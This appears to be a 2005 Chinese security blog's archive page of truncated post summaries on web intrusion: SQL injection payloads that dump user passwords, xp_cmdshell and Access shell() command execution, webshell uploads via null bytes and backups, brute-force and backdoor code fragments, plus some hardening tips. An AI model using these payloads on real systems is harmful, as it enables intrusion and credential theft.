All about security

scripts.girl

导航

05 2005 档案

摘要:Webmin是一个广泛使用的,运行在linux/unix下,用浏览器来管理系统的工具。用它,你不必知道复杂的命令行,也不用了解各种复杂的配置文件,系统管理变得非常简单!可以设置帐号,配置DNS和文件共享等. Webmin BruteForce + Command execution v1.5 #!/usr/bin/perl######################################... 阅读全文

posted @ 2005-05-25 00:57 isno's world 阅读(484) 评论(0) 推荐(0)

摘要:来自:kEvin1986's BloG SysTem MS SQL Server passwords bruteforce PoC via SQL InjectionPF外国人能想到用openrowset在SQL INJECTION中暴力猜解MSSQL的密码...其实如果变通思维,我们早该想到的....... MS SQL Server passwords bruteforce PoC via ... 阅读全文

posted @ 2005-05-25 00:56 isno's world 阅读(364) 评论(0) 推荐(0)

摘要:web站点默认80为服务端口,关于它的各种安全问题不断的发布出来,这些 漏洞中一些甚至允许攻击者获得系统管理员的权限进入站点内部,以下是Zenomo rph对一些80端口攻击方式的痕迹的研究,和告诉你怎样从日志记录中发现问题 。 详细描述 下面部分通过一些列子,展示对web服务器和其上的应用程序普遍的攻击, 和其留下的痕迹,这些列子仅仅是代表了主要的攻击方式,并没有列出所有的攻 击形式,这... 阅读全文

posted @ 2005-05-24 00:08 isno's world 阅读(413) 评论(0) 推荐(0)

摘要:文章作者:lcx在ASP+MSSQL情况下InJection直接得到一个webshell是很平常的事情,但是在asp+acess下是一件不可能完成的任务,因为ACESS的弱智sql语句很难让你有所作为。不过,巧妙利用acess程序的一些特性,我们也可以间接得到一个webshell。一、利用acess数据库备份到shell。我曾经通过常规注射方法拿到了一个下载系统的后台密码。但是进入后... 阅读全文

posted @ 2005-05-23 23:57 isno's world 阅读(891) 评论(0) 推荐(0)

摘要:近来,网络上的SQL Injection 漏洞利用攻击,JS脚本,HTML脚本攻击似乎逾演逾烈。陆续的很多站点都被此类攻击所困扰,并非像主机漏洞那样可以当即修复,来自于WEB的攻击方式使我们在防范或者是修复上都带来了很大的不便。HOOO…… 一个站长最大的痛苦莫过于此。自己的密码如何如何强壮却始终被攻击者得到,但如何才能做到真正意义上的安全呢?第一,别把密码和你的生活联系起来;第二,Superma... 阅读全文

posted @ 2005-05-22 21:41 isno's world 阅读(376) 评论(0) 推荐(0)

摘要:随着QQ新增了等级制度,许多网友都热衷于“挂级”(就是让QQ长时间在线以获得更多 在线时间),期待星星变月亮,月亮变太阳。网上也出现了一些挂级工具,其实原理很 简单。QQ上线时间只要超过35秒,腾讯就计为上线一分钟。所以只要上线35秒后离线, 然后再上线,就比正常计时节约了20秒左右,即二小时可以得到三小时的在线时长,如 此往复就达到了加速成的目的。本着DIY的精神我也做了个挂级小工具。 编... 阅读全文

posted @ 2005-05-19 08:46 isno's world 阅读(775) 评论(0) 推荐(0)

摘要:unit Unit1; interface usesWindows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,Dialogs, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient,IdHTTP, StdCtrls, IdAntiFreezeBa... 阅读全文

posted @ 2005-05-18 01:53 isno's world 阅读(649) 评论(0) 推荐(0)

摘要:很偶然的一个机会,看到了一个网站,页面清新,很舒服的感觉。网站是用JSP开发的, 由于个人爱好,所以我决定看看系统的安全性。 telnet www.target.com 8080 GET /CHINANSL HTTP/1.1 [Enter] [Enter] 返回的结果如下: HTTP/1.0 404 Not Found Date: Sun, 08 Jul 2001 07:49:13 GMT Ser... 阅读全文

posted @ 2005-05-18 01:53 isno's world 阅读(381) 评论(0) 推荐(0)

摘要:这是一篇程序员写给程序员的趣味读物。所谓趣味是指可以比较轻松地了解一些原来不 清楚的概念,增进知识,类似于打RPG游戏的升级。整理这篇文章的动机是两个问题: 问题一: 使用Windows记事本的“另存为”,可以在GBK、Unicode、Unicode big endian和UTF-8 这几种编码方式间相互转换。同样是txt文件,Windows是怎样识别编码方式的呢? 我很早前就发现Unicode... 阅读全文

posted @ 2005-05-18 01:52 isno's world 阅读(296) 评论(0) 推荐(0)

摘要:删除以下的注册表主键:WScript.ShellWScript.Shell.1Shell.applicationShell.application.1WSCRIPT.NETWORKWSCRIPT.NETWORK.1regsvr32/u wshom.ocx回车、regsvr32/u wshext.dll回车Windows 2003 硬盘安全设置c:\administrators 全部system 全... 阅读全文

posted @ 2005-05-17 00:38 isno's world 阅读(335) 评论(0) 推荐(0)

摘要:作者:[微风山谷] 来源:[世纪安全网络--21SaFe.CoM] 浏览:[ 33 ] 评论:[0] Function Checkstr(Str) If Isnull(Str) Then CheckStr = "" Exit Function End If Str = Replace(Str,Chr(0),"", 1, -1, 1) Str = Replace(Str, """", "&... 阅读全文

posted @ 2005-05-17 00:38 isno's world 阅读(417) 评论(0) 推荐(0)

摘要:if(description){ script_id(1000000); script_version ("$Revision: 1.0 $"); name["english"] = "detect os"; script_name(english:name["english"]); desc["english"] = "This script connects to the remote h... 阅读全文

posted @ 2005-05-14 03:10 isno's world 阅读(418) 评论(0) 推荐(0)

摘要:Hacker defender 中文使用说明 ---------------------------------------------------------------------- 文章译者:ZiQi [E.S.T]信息来源:邪恶八进制安全小组(www.eviloctal.com) 才疏学浅,不便之处,还请多多包涵。 =============[Hacker defender -中文使用说... 阅读全文

posted @ 2005-05-14 03:09 isno's world 阅读(598) 评论(0) 推荐(0)

摘要:今天去网上测试MySQL Fun漏洞(其实不能说是漏洞,只能说是一个技术而已).用MySQL Fun的一些技术刚攻克一台Xeon的主机,进去之后,想做点测试,但是突然发现这台主机的C:\下有一个叫FurQ.Dll的东西,28K大小,感觉和我用的那个程序非常相似.....于是感觉比较疑惑.就将这个FurQ.DLL放到IIS目录里下到本机里用W32DSM进行反汇编,虽然我这点能力不强,但是还是希望能通... 阅读全文

posted @ 2005-05-13 01:55 isno's world 阅读(374) 评论(0) 推荐(0)

摘要:文章作者:bbb (九万里风鹏路) 贴这篇文章之前首先向spark说声对不起本来很早以前就想写这篇文章的可惜那时候刚好赶上换工作好了闲话少说,言归正传 这儿的WWW攻击只限一般站点的攻击对于采用安全连接的站点还没有试过一个很好的实践的目标就是各种支持WWW的免费邮件如果你想用它来进入黄色站点那也没办法 :)一般的站点中如果你想浏览某些需要授权的内容首先要经过身份验证这一步就是让你输入用户名、密码然... 阅读全文

posted @ 2005-05-13 01:39 isno's world 阅读(423) 评论(0) 推荐(0)

摘要:郁闷的通宵,无意在xiaolu群里看到某人放出了某个安全站点的Web Shell地址,当然,和以往一样,能看到的只是别人给出的后门,没人会这么轻易就给密码你玩上一份.好奇心驱使,顺着给出的URL,打开看到了是个ASP SHELL.很熟悉的界面,感觉有的玩了.(图1) _auto_size(this,450,true); } }" align=baseline> 前一段时间就知道了这个As... 阅读全文

posted @ 2005-05-13 01:33 isno's world 阅读(356) 评论(0) 推荐(0)

摘要:#include#include #pragma comment (lib, "Ws2_32.lib")int port=1983;DWORD WINAPI ClientThread(LPVOID lpParam);void Help(){printf(" /***************************************\\\n");printf(" |This S... 阅读全文

posted @ 2005-05-12 15:16 isno's world 阅读(374) 评论(0) 推荐(0)

摘要:前言: 说起“中间人攻击(Man-in-the-middle-attacks,简称:MITM攻击)”大家可能马上想起曾经风靡一时的SMB会话劫持,DNS欺骗等技术,这些都是典型的MITM攻击手段。其实MITM攻击说它是一种手段,不如说它是一种攻击模式,它可以应用于各个领域,比如在现实中,A通过B给C传话,那么B在传话给C的时候,可以夸大其词,也可以填油加醋后传给C,在这个过程中中间人B ... 阅读全文

posted @ 2005-05-12 15:03 isno's world 阅读(644) 评论(0) 推荐(0)

摘要:SQL Server 数据库的备份与恢复 选择操作:备份 恢复 数据库名:"> 文件路径:(备份或恢复的文件路径,备份成EXE主要为了方便下载,活活..) 0 then response.write err.number&"" response.write err.description&"" end if Response.write "备份成功!" elseif act = ... 阅读全文

posted @ 2005-05-12 15:02 isno's world 阅读(600) 评论(0) 推荐(0)

摘要:看了臭要饭写的跨库查询,我整理了一下从暴库到暴出密码等的一般 步骤,使得思路更清晰些。 SQL INJECTION 灵活多变,注入的语句不一,下面只提供暴库的一般 步骤,希望能对你有帮助。 1:暴出所有库名. http://www.***.com/***.asp?id=1 and 0(select count(*) from master.dbo.sysdatabases where... 阅读全文

posted @ 2005-05-12 01:41 isno's world 阅读(358) 评论(0) 推荐(0)

摘要:很多站都是这样防止或是过滤ASP提交的参数的 ifisnumeric(id)Then response.write"yes!" callsql_query(id) else response.write"Errorid" Response.End endif 这样就不论怎么样,如果出现非数值就出现错误,很直接的防范,没办法出错,也没办法得到数据库类型 但是其... 阅读全文

posted @ 2005-05-12 01:40 isno's world 阅读(433) 评论(0) 推荐(0)

摘要:来自:TNT-BSecurityTeam 这篇是我们TNT-B小组贴在dvbbs上的一篇文章! 原文见http://www.dvbbs.net/TNT-B/DVBBS.TXT可能现在已经删了!hoho 前段时间听说动网的上传再次出现了不可修复的错误,有人居然说是upload.inc有错,我仔细的读了N遍代码,可以肯定的说,upload.inc应该没有办法利用,今天无意中跑到动网的官... 阅读全文

posted @ 2005-05-12 01:40 isno's world 阅读(351) 评论(0) 推荐(0)

摘要:#!/usr/bin/perl -w use IO::Socket; ## Example: ## C:\>phpbb.pl www.site.com /phpBB2/ 2 ## ## downloads.php mod in phpBB \n"; print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n"; print " [~... 阅读全文

posted @ 2005-05-12 01:39 isno's world 阅读(384) 评论(0) 推荐(0)

摘要:引用:找到一点关于不要绝对路径的东西,希望讨论一下! ACCESS的跨库是通过中括号实现的,包括路径,密码设置等;跨库的前提是已经打开了一个Connection。 问题说明: 有时需要在两个或三个数据库的表中,通过相关关键字,查询获取所需记录集,用一般的SQL查询语句是实现不... 阅读全文

posted @ 2005-05-12 01:38 isno's world 阅读(485) 评论(0) 推荐(0)

摘要:适合读者:入侵爱好者、网管 前置知识:无 脚本小子:ASP注入漏洞在国内可谓是火得不能再火了,很多大站被它搞定过。绝大多数朋友都是利用工具,或者通过手工在后面加上“AND 1=1”和“AND 1=2”,再根据返回的页面内容来判断是否存在注入漏洞的,但是有另外的注入方法却被我们忽略了。 搜索型注入成功搞定跨国电子公司 文/图 勇哥儿 大家都知道,注入方式主要有数字型和字符型,但... 阅读全文

posted @ 2005-05-12 01:36 isno's world 阅读(603) 评论(0) 推荐(0)

摘要:1 asp 抓包后只要对未过滤的,比如目录名、文件名后面加个空格,并在UltraEdit中将空格的hex字符修改成00 然后再将d:\hack\mm\mm.asp修改成mm.jpg就可以了。 再用nc提交 2 php 第一处只要在修改成mm.php%00 再将d:\hack\mm\mm.php修改成mm.jpg即可 再用nc提交 3 jsp 只要将包的"Content-Type: text/p... 阅读全文

posted @ 2005-05-12 01:35 isno's world 阅读(462) 评论(0) 推荐(0)

摘要:四两拨千斤: 关于这个问题我不想多提,反正经过了一个晚上的测试。 (我想是应该写个文章投搞了!) 就是关于“斑主评定”栏目,当然是插件。 插件比较乱,有很多,比如前台就是 z_disadmin.asp z_disadmin_edit.asp z_disadminconn.asp 后台在data/#pingding.mdb 有的后台在data/pingding.asp 有的则在data/di... 阅读全文

posted @ 2005-05-12 01:35 isno's world 阅读(284) 评论(0) 推荐(0)

摘要:我前段时间写了一篇《MySQL注入中导出字段内容的研究——通过注入导出WebShell》(http://www.4ngel.net/article/37.htm),是查询数据然后在生成文件的,现在我发现其实不少PHP程序,比如IPB就是把数据处理过了,再插入数据库,一般是htmlspecialchars()之后,插入数据,所以利用该文的方法,就行不通了,即使把webshell的代码插入数据库,生成... 阅读全文

posted @ 2005-05-12 01:34 isno's world 阅读(589) 评论(0) 推荐(0)

摘要:新漏洞,对sql和access通杀 ALLyeSNo[Godkiller Team] 漏洞处在blog.asp中:如下代码 ----------------------------------------------------------------- "" then sql="select * from [calendar] where id="&id&" order by id Desc"... 阅读全文

posted @ 2005-05-12 01:33 isno's world 阅读(935) 评论(0) 推荐(0)

摘要:今天看到一个难题: http://www.cnnb.net.cn/lake2/Challenge/challenge.asp?id=1 (呵呵,有空大家也可以去试试自己的实力) 这个本来是不想公布的,但是不写手又痒痒,所以才写这个文章,用来自勉! 大家一定要试过后,才来看我的解答! -----------------------------秘密文件--------------------... 阅读全文

posted @ 2005-05-12 01:31 isno's world 阅读(307) 评论(0) 推荐(0)

摘要:这个漏洞实在不想说,靠这个看了不少免费电影! 现在公布一下吧: 就是re.asp里面对id参数未过滤。 这样来利用 re.asp?id=0 union select 1,1,1 from users where oklook>=5(4,3,2,1) re.asp?id=0 union select 1,userid,password from users where oklook>=5 re.a... 阅读全文

posted @ 2005-05-12 01:29 isno's world 阅读(352) 评论(0) 推荐(0)

摘要:asp木马登陆密码验证关键代码如下: if Epass(trim(request.form("password")))="q_ux624q|p" then response.cookies("password")="8811748" ... 很明显,用的是Epass函数把输入的密码进行加密,然后将得到的密文和原密文进 行比对。如果稍有点编程基础的话,特别是VB,那么Epass里的加密算... 阅读全文

posted @ 2005-05-12 01:28 isno's world 阅读(781) 评论(0) 推荐(0)

摘要:在地址栏或按Ctrl+O,输入: javascript:s=document.documentElement.outerHTML;document.write('');document.body.innerText=s; 源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。 阅读全文

posted @ 2005-05-12 01:28 isno's world 阅读(332) 评论(0) 推荐(0)

摘要:NB-裤衩[XX] 日前SQLINJECTION的攻击测试愈演愈烈,很多大型的网站和论坛都相继被注入。这些网站一般使用的多为SQLSERVER数据库,正因为如此,很多人开始怀疑SQLSERVER的安全性。其实SQLSERVER2000已经通过了美国政府的C2级安全认证-这是该行业所能拥有的最高认证级别,所以使用SQLSERVER还是相当的安全的。当然和ORCAL、DB2等还是有差... 阅读全文

posted @ 2005-05-12 01:26 isno's world 阅读(690) 评论(0) 推荐(0)

摘要:SQL Server中包含了几个可以访问系统注册表的扩展存储过程.但实际上这几个扩 展存储过程是未公开的,从sql server 7.0就有了, 在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供 了在当前的SQL Server版本中访问系统注册表的能力, 而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程 .所以最好在... 阅读全文

posted @ 2005-05-12 01:26 isno's world 阅读(382) 评论(0) 推荐(0)

摘要:G:\test>type/? 显示文本文件的内容。 TYPE [drive:][path]filename 当然type还有其他用途 G:\test>type mm.exe>allyesno.exe G:\test>allyesno VNCrackX4 by Phenoelit (http://www.phenoelit.de/) Usage: Online: ./vncrack -h ... 阅读全文

posted @ 2005-05-12 01:24 isno's world 阅读(372) 评论(0) 推荐(0)

摘要:%5c类的 漏洞在asp不再复述 我们看看 它在asp.net下的问题 Microsoft ASP.NET vulnerability (updated Oct. 7th) Microsoft announced a possible vulnerability in ASP.NET (http://www.microsoft.com/security/incident/aspnet.... 阅读全文

posted @ 2005-05-12 01:24 isno's world 阅读(376) 评论(0) 推荐(0)

摘要:数据库是电子商务、金融以及ERP系统的基础,通常都保存着重要的商业伙伴和 客户信息。大多数企业、组织以及政府部门的电子数据都保存在各种数据库中,他们 用这些数据库保存一些个人资料,还掌握着敏感的金融数据。但是数据库通常没有象 操作系统和网络这样在安全性上受到重视。数据是企业,组织的命脉所在,因此选择 一款安全的数据库是至关重要的。大型网站一般使用oracle或DB2,而中小型网站大 多数... 阅读全文

posted @ 2005-05-12 01:23 isno's world 阅读(404) 评论(0) 推荐(0)

摘要:分析phpwind2.0.1漏洞 by猫猫&&allyesno 时间:2005年4月17日,凌晨。 猫猫传给我一个phpwind2.0.1漏洞利用程序,可以直接在目录中写入一个木马。怎么说呢,这个漏洞是pinkeyes发现的,本文旨在分析这个漏洞的思路。直到发现这个漏洞是怎么产生的,我还在冒虚汗中,同时pinkeyes 的睿智深深的打动了我,原来我才明白什么才是真正的技术含量。且听我慢... 阅读全文

posted @ 2005-05-12 01:22 isno's world 阅读(296) 评论(0) 推荐(0)

摘要:一定是暴绝对路径哦!不能暴数据库路径 可以拿出来吓吓人用的。 就是dvbbs的connad.ASP。看看怎么写的 恩,确实少了点东西 这样的话,程序在二级目录的都可以暴,看看我是怎么暴的。 按照文章的思路是这样的。 一定要是二级站点比如类似:http://wwww.target.com/bbs/ 记得有个文章提到的可以从一级站点暴库:方法是http://target.com/noexis... 阅读全文

posted @ 2005-05-12 01:21 isno's world 阅读(348) 评论(0) 推荐(0)

摘要:海阳顶端网jsp暴源码及目录网页使用帮助: 第一个写域名;第二个写路径;第三个写文件名,注意不要加扩展名: 阅读全文

posted @ 2005-05-12 01:20 isno's world 阅读(512) 评论(0) 推荐(0)

摘要:这个文章好象大家还是不太理解,我来做个解释。 文章的原意是:由于dvbbs7.1对备分有检测机制: ----下面代码来自dvbbs7.1中的data.asp文件------------ FileConnStr = "Provider = Microsoft.Jet.OLEDB.4.0;Data Source = " & Dbpath Set Fileconn = Server.Cr... 阅读全文

posted @ 2005-05-12 01:19 isno's world 阅读(403) 评论(0) 推荐(0)

摘要:文章的用意是气气 魔王的!让他知道自己的无知,本来他发表的那个漏洞是可以这样利用的: 有下面的一段代码: 使用了trim函数来去掉开头和结尾的空格,在一般的情况下,这段程序执行的很正常,但是后来竟然发现有人竟然可以使用空格来,意思就是说,该用户的name完全为空格,但是自己尝试使用空格却无论都不能通过(即被程序监测了出来),开头和结尾的空格都被trim函数给去掉了,即使中间有空格,若... 阅读全文

posted @ 2005-05-12 01:19 isno's world 阅读(303) 评论(0) 推荐(0)

摘要:----------------------------------------------------------------------------- SQL injectionがあるのは判断できるけどエラーがハンドリングされてて エラーメッセージとかから情報がひっぱれず、どうやってもUNIONで 別のSELECTが繋げられないとか、繋げられてもSELECTの直接の結果自体は 画面に表... 阅读全文

posted @ 2005-05-12 01:17 isno's world 阅读(485) 评论(0) 推荐(0)

摘要:方法很简单,我们知道,一般在asp中应用文件时一般采用 两种方式,通过stm文件,是可以直接将asp文件的源代码直接输出到客户浏览器中。 要求: 1、服务器端要有shtml脚本映射 2、可以向服务器写入.stm/.shtm/.shtml后缀文件 3、知道想察看文件的文件名及相对位置 举例: 向服务器目录写入test.stm文... 阅读全文

posted @ 2005-05-12 01:17 isno's world 阅读(357) 评论(0) 推荐(0)

摘要:最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句: EXEC master.dbo.xp_cmdshell 'dir c:\' 但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名,这时侯许多人也许会放弃,因为我们无... 阅读全文

posted @ 2005-05-12 01:16 isno's world 阅读(453) 评论(0) 推荐(0)

摘要:本文作者:angel 文章性质:原创 发布日期:2004-09-17 声明:本文已发表在《黑客X档案》,转载请注明。 前言 记得有一些关于利用MySQL获得Shell的文章,说的是得到一个root权限,远程连接并建立一个表,在里面插入Shell的内容,然后利用intooutfile导出到相应目录,就有了一个后门。我一直没有在意,因为能对MySQL数据库直接操作的机会非常少,而且早已经掌... 阅读全文

posted @ 2005-05-12 01:14 isno's world 阅读(343) 评论(0) 推荐(0)

摘要:1.shell的测试; 我们先在accessl里直接sql查询: 语句: SELECT shell('c:\winnt\system32\cmd.exe /c dir c:\ >c:\123456.txt'); “运行” 得到结果: C:\>dir 123456.txt 驱动器 C 中的卷没有标签。 卷的序列号是 3CEE-A8A9 C:... 阅读全文

posted @ 2005-05-12 01:13 isno's world 阅读(625) 评论(0) 推荐(0)

摘要:利用差异备分来提高backupshell的成功率: 步骤: declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s create table [dbo].[allyesno] ([cmd] [im... 阅读全文

posted @ 2005-05-12 01:12 isno's world 阅读(356) 评论(0) 推荐(0)

摘要:特殊方法学习黑客工具 By ivory(于厦门集美大学) 不知道别人怎么看,笔者感觉,中国人写软件很少有“开放源代码”精神。也不知道是因为怕代码写的差,拿出来丢人,还是商业目的。不管怎样,他们都已经违背了“黑客”的共享精神。好!他们不开放是他们的问题,我们也没办法,不过对于一些软件,我们还是大概能学习它是怎么运作的。不相信?这里拿出法宝“WSockExpert”。朋友们肯定会惊讶,这不... 阅读全文

posted @ 2005-05-12 01:12 isno's world 阅读(888) 评论(0) 推荐(0)

摘要:笑看leadbbs By ivory 一提到漏洞最多的论坛程序,那肯定是非动网和bbsxp这两个莫属了。Leadbbs是个让人头疼的东西,自从上次“移花接木”大法出来后,就再也没人碰它了。我很奇怪,即使是一些所谓的“高手”,竟然碰到这种论坛就选择饶过,利用旁注其他的网站来入侵。这种做法是不对的。我们不能畏难,一个hacker要有不断探索的精神。下面我就带大家一起来剖析这个硬骨头。 我去下... 阅读全文

posted @ 2005-05-12 01:10 isno's world 阅读(589) 评论(0) 推荐(0)

摘要:我以前很早就看到过这篇文章了,他文中提到的这种方法在某些情况下可以实现,但是这种情况比较少见。现在逐步分析每个语句的权限要求: 1. 删除存储过程: drop procedure sp_addlogin 只有在当前登录用户为master数据库的db_owner以上权限的时候才可以成功执行。 2. 创建存储过程: create procedure sp_addlogin 只有在SQL Server打... 阅读全文

posted @ 2005-05-12 01:10 isno's world 阅读(406) 评论(0) 推荐(0)

摘要:Bbsxp最新版本漏洞 By ivory 于厦门集美大学 漏洞测试:ivory&&猫猫 漏洞发现日期:2005-4-8 ... 阅读全文

posted @ 2005-05-12 01:09 isno's world 阅读(644) 评论(0) 推荐(0)